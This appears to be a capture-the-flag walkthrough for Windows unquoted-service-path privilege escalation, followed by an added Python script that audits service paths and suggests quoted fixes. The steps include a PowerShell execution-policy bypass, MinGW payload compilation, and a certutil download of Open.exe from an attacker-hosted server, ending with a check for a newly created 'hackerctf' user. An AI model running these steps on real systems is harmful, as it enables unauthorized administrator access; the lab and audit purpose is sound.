1. Powershell.exe -ep bypass

2. Whoami

3. Net user hackerctf

4. Exit PowerShell back to cmd

5. wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ (optional)

6. Powershell.exe -ep bypass -c "$service = get-wmiobject -query 'select * from win32_service'; echo $service.pathname"

7. Build the payload on Kali from C using MinGW

8. i686-w64-mingw32-gcc -o Open.exe priv-win.c

9. python3 -m http.server 8000

10. cd C:\Users\Public

11. Certutil.exe -urlcache -split -f http://192.168.1.3:8000/Open.exe Open.exe

12. Shutdown /r /t 0

13. Net user hackerctf

14. Done
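Added example, not part of the original walkthrough: the same unquoted-service-path check that steps 5 and 6 perform, run offline over captured service data so an administrator can audit a host and see what to fix. The input is constructed CSV in the column layout of `wmic service get name,pathname,displayname,startmode /format:csv`; the service names, the function names and the `C:\Windows\` exclusion default are assumptions made for the example. For each unquoted path containing a space it lists the shorter paths Windows would try first (the directories whose permissions need reviewing) and the quoted path that should replace it.

```python
"""Defender-side audit for unquoted Windows service paths.

Reproduces the filter in the walkthrough (auto-start, outside C:\\Windows,
PathName not wrapped in quotes) over CSV captured from wmic, and reports the
quoted value an administrator should set as the service's binary path.
"""
import csv
import io
import re

# Constructed sample in the column layout of
# `wmic service get name,pathname,displayname,startmode /format:csv`.
SAMPLE_CSV = r'''Node,DisplayName,Name,PathName,StartMode
HOST1,Windows Update,wuauserv,C:\Windows\system32\svchost.exe -k netsvcs,Auto
HOST1,Backup Agent,BackupAgent,C:\Program Files\Backup Tool\backup agent.exe -svc,Auto
HOST1,Backup Agent (fixed),BackupAgentOk,"""C:\Program Files\Backup Tool\backup agent.exe"" -svc",Auto
HOST1,Updater,UpdaterSvc,C:\Tools\updater.exe,Auto
HOST1,Old Sync,OldSync,C:\Program Files\Sync App\sync.exe,Manual
'''

# Executable portion of an unquoted PathName: everything up to the first ".exe".
EXE_RE = re.compile(r'^(.*?\.exe)', re.IGNORECASE)


def executable_part(pathname):
    """Return the executable part of an unquoted PathName (arguments stripped)."""
    match = EXE_RE.match(pathname)
    return match.group(1) if match else pathname.split(' ')[0]


def probe_candidates(exe):
    """Shorter paths Windows tries, in order, before reaching the real binary.

    For 'C:\\Program Files\\Backup Tool\\backup agent.exe' this yields
    C:\\Program.exe, C:\\Program Files\\Backup.exe, ... which is why the
    parent directories' write permissions matter.
    """
    parts = exe.split(' ')
    return [' '.join(parts[:i]) + '.exe' for i in range(1, len(parts))]


def find_unquoted_service_paths(csv_text, excluded_prefixes=('C:\\Windows\\',),
                                only_auto=True):
    """Return a finding per service whose unquoted binary path contains a space."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        path = row['PathName'].strip()
        if only_auto and row['StartMode'].strip().lower() != 'auto':
            continue  # mirrors `findstr /i auto`
        if path.startswith('"'):
            continue  # already quoted, mirrors `findstr /v """`
        if any(path.lower().startswith(p.lower()) for p in excluded_prefixes):
            continue  # mirrors `findstr /v "C:\Windows\"`
        exe = executable_part(path)
        if ' ' not in exe:
            continue  # unquoted but no space, so not ambiguous
        findings.append({
            'name': row['Name'],
            'path': path,
            'probed': probe_candidates(exe),
            # Remediation value: quote the executable, keep the arguments.
            'quoted_path': f'"{exe}"' + path[len(exe):],
        })
    return findings


if __name__ == '__main__':
    for finding in find_unquoted_service_paths(SAMPLE_CSV):
        print(f"[!] {finding['name']}: {finding['path']}")
        for candidate in finding['probed']:
            print(f"    Windows would probe: {candidate}")
        print(f"    set binary path to: {finding['quoted_path']}")
```

On a real host, replace SAMPLE_CSV with the saved wmic output; the only finding in the sample is BackupAgent, since the quoted copy, the service without a space and the manual-start service are all filtered out just as the findstr chain filters them.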
